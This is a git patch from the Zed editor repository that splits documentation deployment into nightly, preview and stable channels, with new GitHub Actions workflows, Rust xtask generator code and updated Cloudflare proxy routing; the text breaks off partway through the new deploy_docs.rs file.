Staged docs releases (#50136) Closes #ISSUE Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - N/A *or* Added/Fixed/Improved ... --- .cloudflare/README.md | 4 +- .cloudflare/docs-proxy/src/worker.js | 17 +- .github/actions/build_docs/action.yml | 46 --- .github/workflows/after_release.yml | 26 +- .github/workflows/deploy_cloudflare.yml | 64 ---- .github/workflows/deploy_docs.yml | 153 ++++++++ .github/workflows/deploy_nightly_docs.yml | 23 ++ .github/workflows/run_tests.yml | 24 +- crates/docs_preprocessor/src/main.rs | 7 + docs/theme/index.hbs | 1 + tooling/xtask/src/tasks/workflows.rs | 3 + .../src/tasks/workflows/after_release.rs | 54 +-- .../xtask/src/tasks/workflows/deploy_docs.rs | 360 ++++++++++++++++++ .../xtask/src/tasks/workflows/run_tests.rs | 51 +-- tooling/xtask/src/tasks/workflows/steps.rs | 2 + tooling/xtask/src/tasks/workflows/vars.rs | 3 + 16 files changed, 639 insertions(+), 199 deletions(-) delete mode 100644 .github/actions/build_docs/action.yml delete mode 100644 .github/workflows/deploy_cloudflare.yml create mode 100644 .github/workflows/deploy_docs.yml create mode 100644 .github/workflows/deploy_nightly_docs.yml create mode 100644 tooling/xtask/src/tasks/workflows/deploy_docs.rs diff --git a/.cloudflare/README.md b/.cloudflare/README.md index d21377ddffd425..8da1a129fee25c 100644 --- a/.cloudflare/README.md +++ b/.cloudflare/README.md @@ -4,11 +4,11 @@ from Cloudflare. - `open-source-website-assets` is used for `install.sh` - `docs-proxy` is used for `https://zed.dev/docs` -On push to `main`, both of these (and the files they depend on) are uploaded to Cloudflare. +During docs deployments, both of these (and the files they depend on) are uploaded to Cloudflare. ### Deployment -These functions are deployed on push to main by the deploy_cloudflare.yml workflow. Worker Rules in Cloudflare intercept requests to zed.dev and proxy them to the appropriate workers. +These functions are deployed by the docs deployment workflows. Worker Rules in Cloudflare intercept requests to zed.dev and proxy them to the appropriate workers. ### Testing diff --git a/.cloudflare/docs-proxy/src/worker.js b/.cloudflare/docs-proxy/src/worker.js index f9f441883ad9b8..08b0265fafbbb0 100644 --- a/.cloudflare/docs-proxy/src/worker.js +++ b/.cloudflare/docs-proxy/src/worker.js @@ -1,7 +1,22 @@ export default { async fetch(request, _env, _ctx) { const url = new URL(request.url); - url.hostname = "docs-anw.pages.dev"; + + if (url.pathname === "/docs/nightly") { + url.hostname = "docs-nightly.pages.dev"; + url.pathname = "/docs/"; + } else if (url.pathname.startsWith("/docs/nightly/")) { + url.hostname = "docs-nightly.pages.dev"; + url.pathname = url.pathname.replace("/docs/nightly/", "/docs/"); + } else if (url.pathname === "/docs/preview") { + url.hostname = "docs-preview-5xd.pages.dev"; + url.pathname = "/docs/"; + } else if (url.pathname.startsWith("/docs/preview/")) { + url.hostname = "docs-preview-5xd.pages.dev"; + url.pathname = url.pathname.replace("/docs/preview/", "/docs/"); + } else { + url.hostname = "docs-anw.pages.dev"; + } let res = await fetch(url, request); diff --git a/.github/actions/build_docs/action.yml b/.github/actions/build_docs/action.yml deleted file mode 100644 index 002f6f4653f894..00000000000000 --- a/.github/actions/build_docs/action.yml +++ /dev/null @@ -1,46 +0,0 @@ -name: "Build docs" -description: "Build the docs" - -runs: - using: "composite" - steps: - - name: Setup mdBook - uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 # v2 - with: - mdbook-version: "0.4.37" - - - name: Cache dependencies - uses: swatinem/rust-cache@9d47c6ad4b02e050fd481d890b2ea34778fd09d6 # v2 - with: - save-if: ${{ github.ref == 'refs/heads/main' }} - # cache-provider: "buildjet" - - - name: Install Linux dependencies - shell: bash -euxo pipefail {0} - run: ./script/linux - - - name: Download WASI SDK - shell: bash -euxo pipefail {0} - run: ./script/download-wasi-sdk - - - name: Generate action metadata - shell: bash -euxo pipefail {0} - run: ./script/generate-action-metadata - - - name: Check for broken links (in MD) - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 # v2.4.1 - with: - args: --no-progress --exclude '^http' './docs/src/**/*' - fail: true - - - name: Build book - shell: bash -euxo pipefail {0} - run: | - mkdir -p target/deploy - mdbook build ./docs --dest-dir=../target/deploy/docs/ - - - name: Check for broken links (in HTML) - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 # v2.4.1 - with: - args: --no-progress --exclude '^http' 'target/deploy/docs/' - fail: true diff --git a/.github/workflows/after_release.yml b/.github/workflows/after_release.yml index ab2220764861b1..f6777aa2c00b38 100644 --- a/.github/workflows/after_release.yml +++ b/.github/workflows/after_release.yml @@ -1,6 +1,9 @@ # Generated from xtask::workflows::after_release # Rebuild with `cargo xtask workflows`. name: after_release +env: + TAG_NAME: ${{ github.event.release.tag_name || inputs.tag_name }} + IS_PRERELEASE: ${{ github.event.release.prerelease || inputs.prerelease }} on: release: types: @@ -25,7 +28,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: after_release::rebuild_releases_page::refresh_cloud_releases - run: curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag=${{ github.event.release.tag_name || inputs.tag_name }} + run: curl -fX POST "https://cloud.zed.dev/releases/refresh?expect_tag=$TAG_NAME" - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: @@ -34,6 +37,18 @@ jobs: run: ./script/redeploy-vercel env: VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + deploy_docs: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + permissions: + contents: read + uses: zed-industries/zed/.github/workflows/deploy_docs.yml@main + secrets: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }} + CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + with: + channel: ${{ (github.event.release.prerelease || inputs.prerelease) && 'preview' || 'stable' }} + checkout_ref: ${{ github.event.release.tag_name || inputs.tag_name }} post_to_discord: needs: - rebuild_releases_page @@ -43,7 +58,7 @@ jobs: - id: get-release-url name: after_release::post_to_discord::get_release_url run: | - if [ "${{ github.event.release.prerelease || inputs.prerelease }}" == "true" ]; then + if [ "$IS_PRERELEASE" == "true" ]; then URL="https://zed.dev/releases/preview" else URL="https://zed.dev/releases/stable" @@ -55,7 +70,7 @@ jobs: uses: 2428392/gh-truncate-string-action@b3ff790d21cf42af3ca7579146eedb93c8fb0757 with: stringToTruncate: | - 📣 Zed [${{ github.event.release.tag_name || inputs.tag_name }}](<${{ steps.get-release-url.outputs.URL }}>) was just released! + 📣 Zed [${{ env.TAG_NAME }}](<${{ steps.get-release-url.outputs.URL }}>) was just released! ${{ github.event.release.body || inputs.body }} maxLength: 2000 @@ -90,7 +105,7 @@ jobs: - id: set-package-name name: after_release::publish_winget::set_package_name run: | - if ("${{ github.event.release.prerelease || inputs.prerelease }}" -eq "true") { + if ($env:IS_PRERELEASE -eq "true") { $PACKAGE_NAME = "ZedIndustries.Zed.Preview" } else { $PACKAGE_NAME = "ZedIndustries.Zed" @@ -102,7 +117,7 @@ jobs: uses: vedantmgoyal9/winget-releaser@19e706d4c9121098010096f9c495a70a7518b30f with: identifier: ${{ steps.set-package-name.outputs.PACKAGE_NAME }} - release-tag: ${{ github.event.release.tag_name || inputs.tag_name }} + release-tag: ${{ env.TAG_NAME }} max-versions-to-keep: 5 token: ${{ secrets.WINGET_TOKEN }} create_sentry_release: @@ -127,6 +142,7 @@ jobs: - post_to_discord - publish_winget - create_sentry_release + - deploy_docs if: failure() runs-on: namespace-profile-2x4-ubuntu-2404 steps: diff --git a/.github/workflows/deploy_cloudflare.yml b/.github/workflows/deploy_cloudflare.yml deleted file mode 100644 index 4e029c63ccd8a0..00000000000000 --- a/.github/workflows/deploy_cloudflare.yml +++ /dev/null @@ -1,64 +0,0 @@ -name: Deploy Docs - -on: - push: - branches: - - main - -jobs: - deploy-docs: - name: Deploy Docs - if: github.repository_owner == 'zed-industries' - runs-on: namespace-profile-16x32-ubuntu-2204 - - steps: - - name: Checkout repo - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - with: - clean: false - - - name: Set up default .cargo/config.toml - run: cp ./.cargo/collab-config.toml ./.cargo/config.toml - - - name: Build docs - uses: ./.github/actions/build_docs - env: - CC: clang - CXX: clang++ - DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} - DOCS_CONSENT_IO_INSTANCE: ${{ secrets.DOCS_CONSENT_IO_INSTANCE }} - - - name: Deploy Docs - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: pages deploy target/deploy --project-name=docs - - - name: Deploy Install - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: r2 object put -f script/install.sh zed-open-source-website-assets/install.sh - - - name: Deploy Docs Workers - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: deploy .cloudflare/docs-proxy/src/worker.js - - - name: Deploy Install Workers - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: deploy .cloudflare/docs-proxy/src/worker.js - - - name: Preserve Wrangler logs - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4 - if: always() - with: - name: wrangler_logs - path: /home/runner/.config/.wrangler/logs/ diff --git a/.github/workflows/deploy_docs.yml b/.github/workflows/deploy_docs.yml new file mode 100644 index 00000000000000..1739b6b257a953 --- /dev/null +++ b/.github/workflows/deploy_docs.yml @@ -0,0 +1,153 @@ +# Generated from xtask::workflows::deploy_docs +# Rebuild with `cargo xtask workflows`. +name: deploy_docs +on: + workflow_call: + inputs: + channel: + description: channel + type: string + default: '' + checkout_ref: + description: checkout_ref + type: string + default: '' + secrets: + DOCS_AMPLITUDE_API_KEY: + description: DOCS_AMPLITUDE_API_KEY + required: true + CLOUDFLARE_API_TOKEN: + description: CLOUDFLARE_API_TOKEN + required: true + CLOUDFLARE_ACCOUNT_ID: + description: CLOUDFLARE_ACCOUNT_ID + required: true + workflow_dispatch: + inputs: + channel: + description: 'Docs channel to deploy: nightly, preview, or stable' + type: string + default: '' + checkout_ref: + description: Git ref to checkout and deploy. Defaults to event SHA when omitted. + type: string + default: '' +jobs: + deploy_docs: + if: github.repository_owner == 'zed-industries' + name: Build and Deploy Docs + runs-on: namespace-profile-16x32-ubuntu-2204 + env: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CC: clang + CXX: clang++ + steps: + - id: resolve-channel + name: deploy_docs::resolve_channel_step + run: | + if [ -z "$CHANNEL" ]; then + if [ "$GITHUB_REF" = "refs/heads/main" ]; then + CHANNEL="nightly" + else + echo "::error::channel input is required when ref is not main." + exit 1 + fi + fi + + case "$CHANNEL" in + "nightly") + SITE_URL="/docs/nightly/" + PROJECT_NAME="docs-nightly" + ;; + "preview") + SITE_URL="/docs/preview/" + PROJECT_NAME="docs-preview" + ;; + "stable") + SITE_URL="/docs/" + PROJECT_NAME="docs" + ;; + *) + echo "::error::Invalid docs channel '$CHANNEL'. Expected one of: nightly, preview, stable." + exit 1 + ;; + esac + + { + echo "channel=$CHANNEL" + echo "site_url=$SITE_URL" + echo "project_name=$PROJECT_NAME" + } >> "$GITHUB_OUTPUT" + env: + CHANNEL: ${{ inputs.channel }} + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + ref: ${{ inputs.checkout_ref != '' && inputs.checkout_ref || github.sha }} + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: steps::setup_linux + run: ./script/linux + - name: steps::download_wasi_sdk + run: ./script/download-wasi-sdk + - name: ./script/generate-action-metadata + run: ./script/generate-action-metadata + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' './docs/src/**/*' + fail: true + jobSummary: false + - name: deploy_docs::install_mdbook + uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 + with: + mdbook-version: 0.4.37 + - name: deploy_docs::build_docs_book + run: | + mkdir -p target/deploy + mdbook build ./docs --dest-dir=../target/deploy/docs/ + env: + DOCS_CHANNEL: ${{ steps.resolve-channel.outputs.channel }} + MDBOOK_BOOK__SITE_URL: ${{ steps.resolve-channel.outputs.site_url }} + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' 'target/deploy/docs' + fail: true + jobSummary: false + - name: deploy_docs::docs_deploy_steps::deploy_to_cf_pages + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: pages deploy target/deploy --project-name=${{ steps.resolve-channel.outputs.project_name }} --branch main + - name: deploy_docs::docs_deploy_steps::upload_install_script + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: r2 object put -f script/install.sh zed-open-source-website-assets/install.sh + - name: deploy_docs::docs_deploy_steps::deploy_docs_worker + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: deploy .cloudflare/docs-proxy/src/worker.js + - name: deploy_docs::docs_deploy_steps::upload_wrangler_logs + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 + with: + name: wrangler_logs + path: /home/runner/.config/.wrangler/logs/ + timeout-minutes: 60 +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/deploy_nightly_docs.yml b/.github/workflows/deploy_nightly_docs.yml new file mode 100644 index 00000000000000..340713e0a41d1a --- /dev/null +++ b/.github/workflows/deploy_nightly_docs.yml @@ -0,0 +1,23 @@ +# Generated from xtask::workflows::deploy_nightly_docs +# Rebuild with `cargo xtask workflows`. +name: deploy_nightly_docs +on: + push: + branches: + - main +jobs: + deploy_docs: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + permissions: + contents: read + uses: zed-industries/zed/.github/workflows/deploy_docs.yml@main + secrets: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }} + CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + with: + channel: nightly + checkout_ref: ${{ github.sha }} +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 2051fa567b53af..4ce9b3cc1d6d5a 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -637,8 +637,9 @@ jobs: needs: - orchestrate if: needs.orchestrate.outputs.run_docs == 'true' && github.event_name != 'merge_group' - runs-on: namespace-profile-8x16-ubuntu-2204 + runs-on: namespace-profile-16x32-ubuntu-2204 env: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} CC: clang CXX: clang++ steps: @@ -655,27 +656,30 @@ jobs: with: cache: rust path: ~/.rustup - - name: run_tests::check_docs::lychee_link_check - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 - with: - args: --no-progress --exclude '^http' './docs/src/**/*' - fail: true - jobSummary: false - name: steps::setup_linux run: ./script/linux - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/generate-action-metadata run: ./script/generate-action-metadata - - name: run_tests::check_docs::install_mdbook + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' './docs/src/**/*' + fail: true + jobSummary: false + - name: deploy_docs::install_mdbook uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 with: mdbook-version: 0.4.37 - - name: run_tests::check_docs::build_docs + - name: deploy_docs::build_docs_book run: | mkdir -p target/deploy mdbook build ./docs --dest-dir=../target/deploy/docs/ - - name: run_tests::check_docs::lychee_link_check + env: + DOCS_CHANNEL: stable + MDBOOK_BOOK__SITE_URL: /docs/ + - name: deploy_docs::lychee_link_check uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 with: args: --no-progress --exclude '^http' 'target/deploy/docs' diff --git a/crates/docs_preprocessor/src/main.rs b/crates/docs_preprocessor/src/main.rs index 6655d86d25c90b..5b860ba16cdd8b 100644 --- a/crates/docs_preprocessor/src/main.rs +++ b/crates/docs_preprocessor/src/main.rs @@ -679,6 +679,12 @@ fn handle_postprocessing() -> Result<()> { .to_string(); let amplitude_key = std::env::var("DOCS_AMPLITUDE_API_KEY").unwrap_or_default(); let consent_io_instance = std::env::var("DOCS_CONSENT_IO_INSTANCE").unwrap_or_default(); + let docs_channel = std::env::var("DOCS_CHANNEL").unwrap_or_else(|_| "stable".to_string()); + let noindex = if docs_channel == "nightly" || docs_channel == "preview" { + "" + } else { + "" + }; output.insert("html".to_string(), zed_html); mdbook::Renderer::render(&mdbook::renderer::HtmlHandlebars::new(), &ctx)?; @@ -749,6 +755,7 @@ fn handle_postprocessing() -> Result<()> { let contents = contents.replace("#description#", meta_description); let contents = contents.replace("#amplitude_key#", &litude_key); let contents = contents.replace("#consent_io_instance#", &consent_io_instance); + let contents = contents.replace("#noindex#", noindex); let contents = title_regex() .replace(&contents, |_: ®ex::Captures| { format!("{}", meta_title) diff --git a/docs/theme/index.hbs b/docs/theme/index.hbs index 24378bcca6909b..2c7786817aa2f1 100644 --- a/docs/theme/index.hbs +++ b/docs/theme/index.hbs @@ -30,6 +30,7 @@ {{#if is_print }} {{/if}} + #noindex# {{#if base_url}} {{/if}} diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 2e21363bb65003..b275503f34d125 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -15,6 +15,7 @@ mod compare_perf; mod compliance_check; mod danger; mod deploy_collab; +mod deploy_docs; mod extension_auto_bump; mod extension_bump; mod extension_tests; @@ -203,6 +204,8 @@ pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(compliance_check::compliance_check), WorkflowFile::zed(danger::danger), WorkflowFile::zed(deploy_collab::deploy_collab), + WorkflowFile::zed(deploy_docs::deploy_docs), + WorkflowFile::zed(deploy_docs::deploy_nightly_docs), WorkflowFile::zed(extension_bump::extension_bump), WorkflowFile::zed(extension_auto_bump::extension_auto_bump), WorkflowFile::zed(extension_tests::extension_tests), diff --git a/tooling/xtask/src/tasks/workflows/after_release.rs b/tooling/xtask/src/tasks/workflows/after_release.rs index 07ff1fba0d4799..fe96325c7fd286 100644 --- a/tooling/xtask/src/tasks/workflows/after_release.rs +++ b/tooling/xtask/src/tasks/workflows/after_release.rs @@ -1,15 +1,19 @@ use gh_workflow::*; use crate::tasks::workflows::{ + deploy_docs::deploy_docs_workflow_call, release::{self, notify_on_failure}, runners, steps::{CommonJobConditions, NamedJob, checkout_repo, dependant_job, named}, vars::{self, StepOutput, WorkflowInput}, }; -const TAG_NAME: &str = "${{ github.event.release.tag_name || inputs.tag_name }}"; -const IS_PRERELEASE: &str = "${{ github.event.release.prerelease || inputs.prerelease }}"; +const TAG_NAME_ENV: &str = "${{ github.event.release.tag_name || inputs.tag_name }}"; +const IS_PRERELEASE_ENV: &str = "${{ github.event.release.prerelease || inputs.prerelease }}"; +const TAG_NAME: &str = "${{ env.TAG_NAME }}"; const RELEASE_BODY: &str = "${{ github.event.release.body || inputs.body }}"; +const DOCS_CHANNEL: &str = + "${{ (github.event.release.prerelease || inputs.prerelease) && 'preview' || 'stable' }}"; pub fn after_release() -> Workflow { let tag_name = WorkflowInput::string("tag_name", None); @@ -17,17 +21,26 @@ pub fn after_release() -> Workflow { let body = WorkflowInput::string("body", Some(String::new())); let refresh_zed_dev = rebuild_releases_page(); + let deploy_docs = deploy_docs_workflow_call(DOCS_CHANNEL, TAG_NAME_ENV); let post_to_discord = post_to_discord(&[&refresh_zed_dev]); let publish_winget = publish_winget(); let create_sentry_release = create_sentry_release(); - let notify_on_failure = notify_on_failure(&[ - &refresh_zed_dev, - &post_to_discord, - &publish_winget, - &create_sentry_release, - ]); + let notify_on_failure = { + let notify_on_failure = notify_on_failure(&[ + &refresh_zed_dev, + &post_to_discord, + &publish_winget, + &create_sentry_release, + ]); + NamedJob { + name: notify_on_failure.name, + job: notify_on_failure.job.add_need(deploy_docs.name.clone()), + } + }; named::workflow() + .add_env(("TAG_NAME", TAG_NAME_ENV)) + .add_env(("IS_PRERELEASE", IS_PRERELEASE_ENV)) .on(Event::default() .release(Release::default().types(vec![ReleaseType::Published])) .workflow_dispatch( @@ -37,6 +50,7 @@ pub fn after_release() -> Workflow { .add_input(body.name, body.input()), )) .add_job(refresh_zed_dev.name, refresh_zed_dev.job) + .add_job(deploy_docs.name, deploy_docs.job) .add_job(post_to_discord.name, post_to_discord.job) .add_job(publish_winget.name, publish_winget.job) .add_job(create_sentry_release.name, create_sentry_release.job) @@ -45,9 +59,7 @@ pub fn after_release() -> Workflow { fn rebuild_releases_page() -> NamedJob { fn refresh_cloud_releases() -> Step { - named::bash(format!( - "curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag={TAG_NAME}" - )) + named::bash("curl -fX POST \"https://cloud.zed.dev/releases/refresh?expect_tag=$TAG_NAME\"") } fn redeploy_zed_dev() -> Step { @@ -66,16 +78,16 @@ fn rebuild_releases_page() -> NamedJob { fn post_to_discord(deps: &[&NamedJob]) -> NamedJob { fn get_release_url() -> Step { - named::bash(format!( - r#"if [ "{IS_PRERELEASE}" == "true" ]; then + named::bash( + r#"if [ "$IS_PRERELEASE" == "true" ]; then URL="https://zed.dev/releases/preview" else URL="https://zed.dev/releases/stable" fi echo "URL=$URL" >> "$GITHUB_OUTPUT" -"# - )) +"#, + ) .id("get-release-url") } @@ -136,17 +148,15 @@ fn publish_winget() -> NamedJob { } fn set_package_name() -> (Step, StepOutput) { - let script = format!( - r#"if ("{IS_PRERELEASE}" -eq "true") {{ + let script = r#"if ($env:IS_PRERELEASE -eq "true") { $PACKAGE_NAME = "ZedIndustries.Zed.Preview" -}} else {{ +} else { $PACKAGE_NAME = "ZedIndustries.Zed" -}} +} echo "PACKAGE_NAME=$PACKAGE_NAME" >> $env:GITHUB_OUTPUT -"# - ); - let step = named::pwsh(&script).id("set-package-name"); +"#; + let step = named::pwsh(script).id("set-package-name"); let output = StepOutput::new(&step, "PACKAGE_NAME"); (step, output) diff --git a/tooling/xtask/src/tasks/workflows/deploy_docs.rs b/tooling/xtask/src/tasks/workflows/deploy_docs.rs new file mode 100644 index 00000000000000..c2cb6331816ae3 --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/deploy_docs.rs @@ -0,0 +1,360 @@ +use gh_workflow::{ + Event, Expression, Input, Job, Level, Permissions, Push, Run, Step, Use, UsesJob, Workflow, + WorkflowCall, WorkflowCallSecret, WorkflowDispatch, +}; + +use crate::tasks::workflows::{ + runners, + steps::{self, CommonJobConditions, FluentBuilder as _, NamedJob, named, release_job}, + vars::{self, StepOutput, WorkflowInput}, +}; + +const BUILD_OUTPUT_DIR: &str = "target/deploy"; + +pub(crate) enum DocsChannel { + Nightly, + Preview, + Stable, +} + +impl DocsChannel { + pub(crate) fn site_url(&self) -> &'static str { + match self { + Self::Nightly => "/docs/nightly/", + Self::Preview => "/docs/preview/", + Self::Stable => "/docs/", + } + } + + pub(crate) fn project_name(&self) -> &'static str { + match self { + Self::Nightly => "docs-nightly", + Self::Preview => "docs-preview", + Self::Stable => "docs", + } + } + + pub(crate) fn channel_name(&self) -> &'static str { + match self { + Self::Nightly => "nightly", + Self::Preview => "preview", + Self::Stable => "stable", + } + } +} + +pub(crate) fn lychee_link_check(dir: &str) -> Step { + named::uses( + "lycheeverse", + "lychee-action", + "82202e5e9c2f4ef1a55a3d02563e1cb6041e5332", + ) // v2.4.1 + .add_with(("args", format!("--no-progress --exclude '^http' '{dir}'"))) + .add_with(("fail", true)) + .add_with(("jobSummary", false)) +} + +pub(crate) fn install_mdbook() -> Step { + named::uses( + "peaceiris", + "actions-mdbook", + "ee69d230fe19748b7abf22df32acaa93833fad08", // v2 + ) + .with(("mdbook-version", "0.4.37")) +} + +pub(crate) fn build_docs_book(docs_channel: String, site_url: String) -> Step { + named::bash(indoc::formatdoc! {r#" + mkdir -p {BUILD_OUTPUT_DIR} + mdbook build ./docs --dest-dir=../{BUILD_OUTPUT_DIR}/docs/ + "#}) + .add_env(("DOCS_CHANNEL", docs_channel)) + .add_env(("MDBOOK_BOOK__SITE_URL", site_url)) +} + +fn docs_build_steps( + job: Job, + checkout_ref: Option, + docs_channel: impl Into, + site_url: impl Into, +) -> Job { + let docs_channel = docs_channel.into(); + let site_url = site_url.into(); + + steps::use_clang( + job.add_env(("DOCS_AMPLITUDE_API_KEY", vars::DOCS_AMPLITUDE_API_KEY)) + .add_step( + steps::checkout_repo().when_some(checkout_ref, |step, checkout_ref| { + step.with_ref(checkout_ref) + }), + ) + .runs_on(runners::LINUX_XL) + .add_step(steps::setup_cargo_config(runners::Platform::Linux)) + .add_step(steps::cache_rust_dependencies_namespace()) + .map(steps::install_linux_dependencies) + .add_step(steps::script("./script/generate-action-metadata")) + .add_step(lychee_link_check("./docs/src/**/*")) + .add_step(install_mdbook()) + .add_step(build_docs_book(docs_channel, site_url)) + .add_step(lychee_link_check(&format!("{BUILD_OUTPUT_DIR}/docs"))), + ) +} + +fn docs_deploy_steps(job: Job, project_name: &StepOutput) -> Job { + fn deploy_to_cf_pages(project_name: &StepOutput) -> Step { + named::uses( + "cloudflare", + "wrangler-action", + "da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(( + "command", + format!( + "pages deploy {BUILD_OUTPUT_DIR} --project-name=${{{{ {} }}}} --branch main", + project_name.expr() + ), + )) + } + + fn upload_install_script() -> Step { + named::uses( + "cloudflare", + "wrangler-action", + "da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(( + "command", + "r2 object put -f script/install.sh zed-open-source-website-assets/install.sh", + )) + } + + fn deploy_docs_worker() -> Step { + named::uses( + "cloudflare", + "wrangler-action", + "da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(("command", "deploy .cloudflare/docs-proxy/src/worker.js")) + } + + fn upload_wrangler_logs() -> Step { + named::uses( + "actions", + "upload-artifact", + "ea165f8d65b6e75b540449e92b4886f43607fa02", + ) // v4 + .if_condition(Expression::new("always()")) + .add_with(("name", "wrangler_logs")) + .add_with(("path", "/home/runner/.config/.wrangler/logs/")) + } + + job.add_step(deploy_to_cf_pages(project_name)) + .add_step(upload_install_script()) + .add_step(deploy_docs_worker()) + .add_step(upload_wrangler_logs()) +} + +pub(crate) fn check_docs() -> NamedJob { + NamedJob { + name: "check_docs".to_owned(), + job: docs_build_steps( + release_job(&[]), + None, + DocsChannel::Stable.channel_name(), + DocsChannel::Stable.site_url(), + ), + } +} + +fn resolve_channel_step( + channel_expr: impl Into, +) -> (Step, StepOutput, StepOutput, StepOutput) { + let step = Step::new("deploy_docs::resolve_channel_step").run(format!( + indoc::indoc! {r#" + if [ -z "$CHANNEL" ]; then + if [ "$GITHUB_REF" = "refs/heads/main" ]; then + CHANNEL="nightly" + else + echo "::error::channel input is required when ref is not main." + exit 1 + fi + fi + + case "$CHANNEL" in + "nightly") + SITE_URL="{nightly_site_url}" + 